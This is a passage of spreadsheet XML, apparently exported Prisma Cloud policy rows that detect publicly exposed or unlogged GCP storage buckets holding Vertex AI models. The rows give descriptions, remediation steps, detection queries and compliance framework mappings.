          <t>GCP Storage Bucket storing Vertex AI model</t>
        </is>
      </c>
      <c r="L2983" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2983" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2983" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2983" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2983" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2983" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R2983" t="inlineStr">
        <is>
          <t>AAT-12.2:Data Source Integrity</t>
        </is>
      </c>
      <c r="S2983" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2983" t="b">
        <v>0</v>
      </c>
      <c r="U2983" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2983" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2983" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCS buckets that are used to store the GCP Vertex AI model.
GCP Vertex AI models (except AutoML Models) are stored in the Storage bucket. Vertex AI model is considered sensitive and confidential intellectual property and its storage location should be checked regularly. The storage location should be as per your organization's security and compliance requirements.
It is recommended to monitor, identify, and evaluate storage location for GCP Vertex AI model regularly to prevent unauthorized access and AI model thefts.</t>
        </is>
      </c>
      <c r="X2983" t="inlineStr">
        <is>
          <t>Review and validate the Vertex AI models are stored in the right Storage buckets. Move and/or delete the model and other related artifacts if they are found in an unexpected location. Review how the model was uploaded to an unauthorised/unapproved storage bucket.</t>
        </is>
      </c>
      <c r="Y2983" t="inlineStr"/>
      <c r="Z2983" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-storage-buckets-list' as X; config from cloud.resource where api.name = 'gcloud-vertex-ai-aiplatform-model' as Y; filter ' $.Y.artifactUri contains $.X.id '; show X;</t>
        </is>
      </c>
      <c r="AA2983" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2983" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2983" t="inlineStr">
        <is>
          <t>PC-GCP-STO-1210</t>
        </is>
      </c>
      <c r="AD2983" t="b">
        <v>1</v>
      </c>
      <c r="AE2983" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2983" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>5ef12058-fd6c-495b-9260-2a13c0ae9d06</t>
        </is>
      </c>
      <c r="AI2983" t="inlineStr">
        <is>
          <t>06296500-a437-4f20-bb90-19f8cee78fe7</t>
        </is>
      </c>
      <c r="AJ2983" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2983" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2984">
      <c r="A2984" t="inlineStr"/>
      <c r="B2984" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2984" s="2" t="inlineStr"/>
      <c r="D2984" t="inlineStr"/>
      <c r="E2984" t="inlineStr"/>
      <c r="F2984" t="inlineStr"/>
      <c r="G2984" t="b">
        <v>1</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2984" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2984" t="inlineStr">
        <is>
          <t>AI model theft risk due to publicly exposed Storage Bucket containing GCP Vertex AI training pipeline output model</t>
        </is>
      </c>
      <c r="L2984" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2984" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2984" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2984" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2984" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2984" t="inlineStr"/>
      <c r="R2984" t="inlineStr"/>
      <c r="S2984" t="inlineStr"/>
      <c r="T2984" t="b">
        <v>0</v>
      </c>
      <c r="U2984" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2984" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2984" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCP storage buckets that contain GCP Vertex AI training pipeline output model
GCP Vertex AI models (except AutoML Models) are stored in buckets. Making a bucket public that stores Vertex AI training pipeline output model can expose sensitive model artifacts to unauthorized access, leading to potential data breaches and intellectual property loss.
It is recommended to keep buckets private if they are used for storing the GCP Vertex AI training pipeline output model.</t>
        </is>
      </c>
      <c r="X2984"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Review and validate that the Vertex AI training pipeline output models are stored in the right Storage buckets. Move and/or delete the model and other related artifacts if they are found in an unexpected location. Review how the Vertex AI training pipeline was configured to output to an unauthorized/unapproved storage bucket.</t>
        </is>
      </c>
      <c r="Y2984" t="inlineStr"/>
      <c r="Z2984" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-storage-buckets-list') and finding.name contains all ('GCP Storage Bucket storing GCP Vertex AI training pipeline output model','GCP Storage buckets are publicly accessible to all authenticated users','GCP Storage buckets are publicly accessible to all users')</t>
        </is>
      </c>
      <c r="AA2984" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2984" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:43</t>
        </is>
      </c>
      <c r="AC2984" t="inlineStr"/>
      <c r="AD2984" t="b">
        <v>1</v>
      </c>
      <c r="AE2984" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2984" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>c4728ab5-26d2-43b7-aeb4-fd4a473a8ac9</t>
        </is>
      </c>
      <c r="AI2984" t="inlineStr">
        <is>
          <t>0b35abb6-ed03-48b1-907c-0477789d7bb4</t>
        </is>
      </c>
      <c r="AJ2984" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2984" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2985">
      <c r="A2985" t="inlineStr">
        <is>
          <t>SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2985" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2985" s="2" t="inlineStr"/>
      <c r="D2985" t="inlineStr"/>
      <c r="E2985" t="inlineStr"/>
      <c r="F2985" t="inlineStr"/>
      <c r="G2985" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2985" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2985" t="inlineStr">
        <is>
          <t>GCP Storage Bucket storing GCP Vertex AI training pipeline output model</t>
        </is>
      </c>
      <c r="L2985" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2985" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2985" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2985" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2985" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2985" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R2985" t="inlineStr">
        <is>
          <t>AAT-12.2:Data Source Integrity</t>
        </is>
      </c>
      <c r="S2985" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2985" t="b">
        <v>0</v>
      </c>
      <c r="U2985" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2985" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2985" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCS buckets that are used to store the GCP Vertex AI training pipeline output model.
GCP Vertex AI training pipeline output models are stored in the Storage bucket. Vertex AI training pipeline output model is considered sensitive and confidential intellectual property and its storage location should be checked regularly. The storage location should be as per your organization's security and compliance requirements.
It is recommended to monitor, identify, and evaluate storage location for the GCP Vertex AI training pipeline output model regularly to prevent unauthorized access and AI model thefts.</t>
        </is>
      </c>
      <c r="X2985" t="inlineStr">
        <is>
          <t>Review and validate the Vertex AI training pipeline output models are stored in the right Storage buckets. Move and/or delete the model and other related artifacts if they are found in an unexpected location. Review how the Vertex AI training pipeline was configured to output to an unauthorised/unapproved storage bucket.</t>
        </is>
      </c>
      <c r="Y2985" t="inlineStr"/>
      <c r="Z2985" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-storage-buckets-list' as X; config from cloud.resource where api.name = 'gcloud-vertex-ai-aiplatform-training-pipeline' as Y; filter ' $.Y.trainingTaskOutputDirectory contains $.X.id '; show X;</t>
        </is>
      </c>
      <c r="AA2985" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2985" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2985" t="inlineStr">
        <is>
          <t>PC-GCP-STO-1211</t>
        </is>
      </c>
      <c r="AD2985" t="b">
        <v>1</v>
      </c>
      <c r="AE2985" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2985" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>fa965ef9-5ffc-4423-a005-d45352519e84</t>
        </is>
      </c>
      <c r="AI2985" t="inlineStr">
        <is>
          <t>10929fb7-0051-4b61-b3df-d81cd7d14380</t>
        </is>
      </c>
      <c r="AJ2985" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2985" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2986">
      <c r="A2986" t="inlineStr"/>
      <c r="B2986" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2986" s="2" t="inlineStr"/>
      <c r="D2986" t="inlineStr"/>
      <c r="E2986" t="inlineStr"/>
      <c r="F2986" t="inlineStr"/>
      <c r="G2986" t="b">
        <v>1</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2986" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2986" t="inlineStr">
        <is>
          <t>AI model theft risk due to unmonitored and publicly exposed Storage Bucket containing GCP Vertex AI training pipeline output model</t>
        </is>
      </c>
      <c r="L2986" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2986" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2986" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2986" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2986" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2986" t="inlineStr"/>
      <c r="R2986" t="inlineStr"/>
      <c r="S2986" t="inlineStr"/>
      <c r="T2986" t="b">
        <v>0</v>
      </c>
      <c r="U2986" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2986" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2986" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCP Storage buckets that are used to store Vertex AI training pipeline output model and do not have usage and storage logging enabled.
Storage bucket usage logs provide information for all of the requests made on a specified bucket and are created hourly and storage logs provide information about the storage consumption of that bucket for the last day and are created daily. Enabling usage and storage logs for the storage bucket containing sensitive Vertex AI pipeline output data enables monitoring access to Vertex AI training pipeline output model and helps in traceback in case of security breaches.
It is recommended to enable usage and storage logging for the storage buckets containing Vertex AI training pipeline output model.</t>
        </is>
      </c>
      <c r="X2986"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Follow the steps mentioned in the below link to enable Access and Storage logs:
Reference : https://cloud.google.com/storage/docs/access-logs</t>
        </is>
      </c>
      <c r="Y2986" t="inlineStr"/>
      <c r="Z2986" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-storage-buckets-list') and finding.name contains all ('GCP Storage Bucket storing GCP Vertex AI training pipeline output model','GCP Storage buckets are publicly accessible to all users','GCP Storage buckets are publicly accessible to all authenticated users','GCP Storage Bucket does not have Access and Storage Logging enabled')</t>
        </is>
      </c>
      <c r="AA2986" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2986" t="inlineStr">
        <is>
          <t>2024-07-19 06:56:52</t>
        </is>
      </c>
      <c r="AC2986" t="inlineStr"/>
      <c r="AD2986" t="b">
        <v>1</v>
      </c>
      <c r="AE2986" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2986" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>33b623fc-1039-4fb0-bd16-04a86e8e0c99</t>
        </is>
      </c>
      <c r="AI2986" t="inlineStr">
        <is>
          <t>5da90e83-f17b-44b5-a375-97a3009e9c74</t>
        </is>
      </c>
      <c r="AJ2986" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2986" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2987">
      <c r="A2987" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, CIS v3.0.0 (GCP) Level 1, ISO 27001:2013, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, HIPAA, NIST CSF, NIST CSF v2.0, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], Insurance Regulatory And Development Authority Of India, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], GDPR, Matt's ATT&amp;ACK, jbrox - GDPR, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, ITSG-33, ISO 27002:2022, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v4.0.12, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, TX-RAMP Level 2, kfirdaus AWS Account-CS, SOC 2, Secure Controls Framework (SCF) - 2024.2, CIS v1.3.0 (GCP), CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, ISO 27001:2013, TX-RAMP Level 1, NIST SP 800-171 Revision 3, Brazilian Data Protection Law (LGPD), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, PCI DSS v4.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, NIST CSF, ITSG-33, MITRE ATT&amp;CK v6.3 [Deprecated], Microsoft Cloud Security Benchmark v1, CIS Controls v8, ISO 27001:2013, SOC 2, NYDFS 23 CRR-NY 500.0, CIS v2.0.0 (GCP) Level 1, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, CIS v1.1.0 (GCP), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Australian Energy Sector Cyber Security Framework (AESCSF), NIST CSF, Rehan, PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, CSA CCM v3.0.1, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST CSF, TX-RAMP Level 2, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, NIST 800-53 Rev 5, CSA CCM v3.0.1, HIPAA, HIPAA, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.2.0 (GCP), PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2987" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2987" s="2" t="inlineStr"/>
      <c r="D2987" t="inlineStr"/>
      <c r="E2987" t="inlineStr"/>
      <c r="F2987" t="inlineStr"/>
      <c r="G2987" t="b">
        <v>1</v>
      </c>
      <c r="H29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87" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2987" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2987" t="inlineStr">
        <is>
          <t>GCP Storage buckets are publicly accessible to all authenticated users</t>
        </is>
      </c>
      <c r="L2987" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2987" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2987" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2987" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2987" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2987" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2987" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2987" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2987" t="b">
        <v>1</v>
      </c>
      <c r="U2987" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2987" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2987" t="inlineStr">
        <is>
          <t>This policy identifies the buckets which are publicly accessible to all authenticated users. Enabling public access to Storage Buckets enables anybody with a web association to access sensitive information that is critical to business. Access over a whole bucket is controlled by IAM. Access to individual objects within the bucket is controlled by its ACLs.</t>
        </is>
      </c>
      <c r="X2987" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Storage (Left Panel)
3. Click Browse
4. Choose the identified Storage bucket whose ACL needs to be modified
5. Click on SHOW INFO PANEL button
6. Check all the ACL groups and make sure that the none of them are set to 'allAuthenticatedUsers'</t>
        </is>
      </c>
      <c r="Y2987" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'storage.buckets.getIamPolicy' and 'storage.buckets.setIamPolicy' permissions. Successful execution will revoke 'allAuthenticatedUsers' permission access in GCP Storage buckets.",
'impact': 'Revokes all authenticated users permission access in GCP Storage buckets',
'cliScriptTemplate': 'gsutil iam ch -d allAuthenticatedUsers gs://$resourceName'</t>
        </is>
      </c>
      <c r="Z2987" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-storage-buckets-list' AND json.rule = 'iam.bindings[*] size greater than 0 and iam.bindings[*].members[*] any equal allAuthenticatedUsers'</t>
        </is>
      </c>
      <c r="AA2987" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2987" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2987" t="inlineStr">
        <is>
          <t>PC-GCP-STO-133</t>
        </is>
      </c>
      <c r="AD2987" t="b">
        <v>1</v>
      </c>
      <c r="AE2987" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2987" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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87" t="inlineStr">
        <is>
          <t>e5ef3a10-7b2a-4248-b750-9369ed21defc</t>
        </is>
      </c>
      <c r="AI2987" t="inlineStr">
        <is>
          <t>9f08e13c-cdd6-4ad1-89f5-ffef6a71e432</t>
        </is>
      </c>
      <c r="AJ2987" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2987" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2988">
      <c r="A2988" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2988" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2988" s="2" t="inlineStr"/>
      <c r="D2988" t="inlineStr"/>
      <c r="E2988" t="inlineStr"/>
      <c r="F2988" t="inlineStr"/>
      <c r="G2988" t="b">
        <v>1</v>
      </c>
      <c r="H29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88" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2988" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2988" t="inlineStr">
        <is>
          <t>GCP Storage Bucket storing GCP Vertex AI pipeline output data</t>
        </is>
      </c>
      <c r="L2988" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2988" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2988" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2988" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2988" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2988" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R2988" t="inlineStr">
        <is>
          <t>AAT-12.2:Data Source Integrity</t>
        </is>
      </c>
      <c r="S2988" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2988" t="b">
        <v>0</v>
      </c>
      <c r="U2988" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2988" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2988" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCS buckets that are used to store GCP Vertex AI pipeline output data.
GCP Vertex AI pipeline output data is stored in the Storage Bucket. This output data is considered sensitive and confidential intellectual property and its storage location should be checked regularly. The storage location should be as per the organization's security and compliance requirements.
It is recommended to monitor, identify, and evaluate storage location for GCP Vertex AI pipeline output data regularly to prevent unauthorized access and AI model thefts.</t>
        </is>
      </c>
      <c r="X2988" t="inlineStr">
        <is>
          <t>Review and validate the GCP Vertex AI pipeline output data is stored in the right Storage bucket. Move and/or delete the output data if it is found in an unexpected location. Review how the Vertex AI pipeline was configured to output to an unauthorised/unapproved storage bucket.</t>
        </is>
      </c>
      <c r="Y2988" t="inlineStr"/>
      <c r="Z2988" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-storage-buckets-list' as X; config from cloud.resource where api.name = 'gcloud-vertex-ai-aiplatform-pipeline-job' as Y; filter ' $.Y.runtimeConfig.gcsOutputDirectory contains $.X.id '; show X;</t>
        </is>
      </c>
      <c r="AA2988" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2988" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2988" t="inlineStr">
        <is>
          <t>PC-GCP-STO-1209</t>
        </is>
      </c>
      <c r="AD2988" t="b">
        <v>1</v>
      </c>
      <c r="AE2988" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2988" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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88" t="inlineStr">
        <is>
          <t>385ed7d0-6fdc-4f37-9d59-5c73f6cbf686</t>
        </is>
      </c>
      <c r="AI2988" t="inlineStr">
        <is>
          <t>d454a37a-bfac-4308-b2db-e6948db33202</t>
        </is>
      </c>
      <c r="AJ2988" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2988" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2989">
      <c r="A2989" t="inlineStr">
        <is>
          <t>ISO 27001:2013, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, CIS v3.0.0 (GCP) Level 1, ISO 27001:2013, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v12, PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH, Copy of ACSC Information Security Manual (ISM)-clone, ITSG-33, ISO 27002:2022, Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), ITSG-33, TX-RAMP Level 2, kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, New Zealand Information Security Manual (NZISM v3.4), CIS v1.3.0 (GCP), CIS v1.2.0 (GCP), NIST 800-53 Rev 5, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, ISO 27001:2013, TX-RAMP Level 1, Brazilian Data Protection Law (LGPD), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, jneytchev-fedramp-low, ITSG-33, MITRE ATT&amp;CK v6.3 [Deprecated], Microsoft Cloud Security Benchmark v1, Risk Management in Technology (RMiT), CIS Controls v8, ISO 27001:2013, SOC 2, CIS v2.0.0 (GCP) Level 1, kfirdaus AWS Account-CS, CIS v1.1.0 (GCP), Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, ISO/IEC 27001:2022, CIS v1.0.0 (GCP), Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, Australian Energy Sector Cyber Security Framework (AESCSF), HITRUST v.9.4.2 [Deprecated], Rehan, PIPEDA, ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, Fedramp (Low), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, CCPA 2018, ACSC Information Security Manual (ISM), CDC NIST 